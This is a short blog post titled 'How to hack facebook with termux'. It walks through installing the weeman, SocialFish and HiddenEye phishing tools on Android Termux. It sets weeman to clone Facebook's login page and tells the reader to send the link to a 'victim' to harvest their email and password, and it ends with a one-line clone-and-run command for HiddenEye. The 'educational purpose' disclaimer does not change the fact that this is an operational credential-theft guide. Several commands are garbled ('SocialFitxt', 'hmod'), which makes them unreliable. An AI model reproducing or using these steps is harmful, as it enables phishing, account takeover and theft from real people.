How to hack facebook with termux
2 minute read
How to hack facebook with termux
NOTE: This article is only for an Educational purpose. Any actions or activities related to the material contained on this Website is solely your responsibility. Misuse of the information in this website can result in criminal charges brought against the persons in question. The Authors and www.marlonetechblog.blogspot.com will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to
break the law.
- How to hack facebook with termux
- apt update && upgrade
- termux-setup-storage
- pkg install python2
- You will be asked termux will use some of your space type y
- pkg install git✳git clone https://github.com/evait-security/weeman.git
- cd weeman && ls
- python2 weeman.py
- Find your ip adress with this command: ifconfig
- set url http://facebook.com
- set action_url https://facebook.com
- set port 8080
- If you're targeting Facebook mobile users then set the url to m.facebook.com
- Eg: set url http://m.facebook.com
- Now finally type this command: run
- that's all you have successfully executed all the commands to hack Facebook
- Now you have to share your IP with your victim to get his username and password
- so send a link to your victim as http://Your_IP:8080
- Eg: http://127.0.0.1:8080
- When your victim opens the link then it will open a phishing page and when they enter their email and password then you will easily get them as shown in the screenshot
- INSTALL SOCIALFISH
- SocialFish is Collection of Advanced Phishing Tools, we can use SocialFish in Termux to Hack Facebook, so let's see how we can install it on Termux
- Firstly install Termux
- Type below commands
- Apt update && apt upgrade
- Then type
- git clone https://github.com/UndeadSec/SocialFish.git
- Type
- cd SocialFitxt
- pip install -r requirements.txt
- Now type
- lspy
- hmod +x SocialFish.py
- Finally Type
- ./SocialFish.py
- Just use your brain to know how to use it
- You can install SocialFish Tool developed by Anon U4DY in Termux By Using Only One Command
- Just copy and paste below command in Termux
- pkg install git python php curl openssh grep && pip3 install wget && git clone https://github.com/DarkSecDevelopers/HiddenEye && cd HiddenEye && chmod 777 HiddenEye.py && python HiddenEye.py
Post a Comment